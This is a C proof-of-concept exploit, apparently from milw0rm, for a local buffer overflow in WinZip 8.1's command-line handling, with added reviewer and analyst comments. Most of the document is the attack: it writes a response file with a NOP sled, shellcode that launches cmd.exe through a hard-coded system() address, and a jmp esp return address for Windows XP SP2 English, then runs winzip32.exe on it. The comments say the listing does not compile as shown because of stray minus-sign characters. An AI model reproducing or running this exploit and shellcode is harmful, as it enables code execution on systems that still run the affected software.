WinZIP 8.1 Command Line Local Buffer Overflow Exploit

  1   /*
  2   *
  3   * WinZip Command Line Local Buffer Overflow
  4   * http://securitytracker.com/alerts/2004/Sep/1011132.html
  5   * http://www.winzip.com/wz90sr1.htm
  6   * Exploit coded By ATmaCA
  7   * Web: atmacasoft.com && spyinstructors.com
  8   * E-Mail: atmaca@icqmail.com
  9   * Credit to kozan
 10   *
 11   */
 12
 13   /*
 14   *
 15   * Tested with WinZip 8.1 on Win XP Sp2 En
 16   * Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
 17   * http://www.winzip.com/wz90sr1.htm
 18   *
 19   */
 20
 21   #include <windows.h>
 22   #include <stdio.h>
 23
 24   #define NOP 0x90   // x86 single-byte no-op; written 384 times in main() as padding before the payload
 25
 26   void main()
      // NOTE(review): non-standard signature; ISO C requires int main(void).
      //
      // Proof-of-concept for the WinZip 8.1 command-line overflow named in the
      // file header (fixed in WinZip 9.0 SR-1, per the header).  Flow: build a
      // winzip32.exe command line that reads a "/@" response file, write that
      // response file with one over-long entry, then launch WinZip on it.
      //
      // Analyst notes: the on-disk artifact is the response file named by
      // tmpfile below (an input-file line followed by a long run of 0x90 bytes
      // and the payload); the process artifact is winzip32.exe started with
      // "/zipandmail /@".  Every address in this file is hard-coded for
      // Windows XP SP2 English (see the inline comments), so the payload is
      // tied to that build.
      //
      // The "−" (U+2212) characters in this listing are extraction artifacts
      // of the ASCII '-' in the original source; the code does not compile as
      // shown.
 27   {
 28           // build the command line "<winzip32.exe> −* /zipandmail /@ <tmpfile>"
 29           char tmpfile[] = "c:\\wzs45.tmp";
 30           char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
 31           char zipandmailpar[] = " −* /zipandmail /@ ";
 32           char runpar[300];   // the three fixed strings total well under 300 bytes, so strcpy/strcat fit
 33           int i = 0;          // NOTE(review): int compared against sizeof() below (signed/unsigned mismatch, harmless here)
 34           strcpy(runpar,winzippath);
 35           strcat(runpar,zipandmailpar);
 36           strcat(runpar,tmpfile);
 37
 38            // the response file must begin with an input file name line;
               // the original author notes the named file need not exist
 39            char inputfile[] = "C:\\someinputfile.ext\n";
 40
 41            // payload: places the string "cmd.exe" on the stack and calls the
               // msvcrt system() address hard-coded in the 5-byte mov below
               // (see the 77C293C7 comment) — XP SP2 English specific
 42            char shellcode[] =
 43            "\x55\x8B\xEC\x33\xFF"
 44            "\x57\x83\xEC\x04\xC6\x45\xF8"
 45            "\x63\xC6\x45\xF9\x6D\xC6\x45"
 46            "\xFA\x64\xC6\x45\xFB\x2E\xC6"
 47            "\x45\xFC\x65\xC6\x45\xFD\x78"
 48            "\xC6\x45\xFE\x65\xB8"
 49            "\xC7\x93\xC2\x77" //77C293C7 system() − WinXP SP2 − msvcrt.dll
 50            "\x50\x8D\x45\xF8\x50"
 51            "\xFF\x55\xF4";
 52

ATmaCA                                                                             06/07/2005
                         WinZIP 8.1 Command Line Local Buffer Overflow Exploit       Page 2/2
 53           // write the response file: input-file line, "c:\" prefix, 384 NOP
              // bytes, payload, four 4-byte trailer fragments, newline
 54           FILE *di;
 55           if( (di=fopen(tmpfile,"wb")) == NULL ){
 56                   return;   // NOTE(review): silent exit, no diagnostic
 57           }
 58
              // copy the input-file line without its terminating NUL (sizeof − 1)
 59           for(i=0;i<sizeof(inputfile)−1;i++)
 60                   fputc(inputfile[i],di);
 61
 62           fprintf(di,"c:\\");   // the over-long path entry starts here
 63
              // 384 bytes of 0x90 padding
 64           for(i=0;i<384;i++)
 65                   fputc(NOP,di);
 66
 67
              // payload bytes, again without the terminating NUL
 68           for(i=0;i<sizeof(shellcode)−1;i++)
 69                   fputc(shellcode[i],di);
 70
              // NOTE(review): raw bytes are passed as the fprintf format string;
              // this only works because none of them is '%' — fwrite is the
              // appropriate call for binary output.  The inline comments give
              // the author's intent for each fragment; the addresses are XP SP2
              // English specific.
 71           fprintf(di,"\xBF\xAC\xDA\x77"); //EIP − WinXp Sp2 Eng − jmp esp addr
 72           fprintf(di,"\x90\x90\x90\x90"); //NOPs
 73           fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
 74           fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp
 75
 76           fprintf(di,"\n");   // terminate the response-file line
 77
 78           fclose(di);   // NOTE(review): fclose() result unchecked on a write stream
 79           WinExec(runpar,SW_SHOW);   // launch winzip32.exe with the crafted command line
 80   }
 81
 82   // milw0rm.com [2005−06−07]



